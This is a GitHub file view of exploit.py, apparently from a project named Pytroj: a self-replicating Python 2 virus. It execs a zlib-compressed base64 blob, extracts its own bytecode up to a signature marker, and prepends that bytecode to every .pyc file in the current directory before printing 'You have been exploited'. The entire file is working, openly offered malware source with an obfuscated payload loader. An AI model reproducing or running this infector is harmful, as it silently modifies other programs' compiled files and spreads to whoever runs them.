forked from jgeralnik/Pytroj
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathexploit.py
63 lines (47 loc) · 7.74 KB
/
exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
signature = "DC9723" #signature is placed at beginning and end of file to identify infected code
import glob, zlib, base64
#File only works as a pyc
if __file__.endswith('.pyc'):
#The minified version of byteplay
exec zlib.decompress(base64.b64decode('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'))
#Load this file and identify the exploit part
f = open(__file__, 'r')
#First 8 bytes are magic number and timestamp
head = f.read(8)
data = Code.from_code(marshal.loads(f.read()))
f.close()
last_line = 1
for i in xrange(2, len(data.code)):
if data.code[i][0] == SetLineno:
#Find last line of code to update the real code appropriately
last_line = data.code[i][1]
if type(data.code[i][1]) == type('') and data.code[i][1] == signature:
#Found signature at end of exploit
EXPLOIT_SIZE = i+1
break
exploit = data.code[:EXPLOIT_SIZE]
def infect(f_to_infect):
f = open(f_to_infect, 'r')
#Magic number and timestamp
head = f.read(8)
data = Code.from_code(marshal.loads(f.read()))
if data.code[1][1] == signature:
#Code is already infected
return
print f_to_infect
f.close()
lines = []
for i, op in enumerate(data.code):
if op[0] == SetLineno:
#Update line numbers to match with new code
data.code[i] = (SetLineno, op[1]+last_line)
#Insert exploit
data.code[:0] = exploit
newfile = open(f_to_infect, 'w')
newfile.write(head)
marshal.dump(data.to_code(), newfile)
newfile.close()
for i in glob.glob("./*.pyc"):
infect(i)
print "You have been exploited"
signature = "DC9723"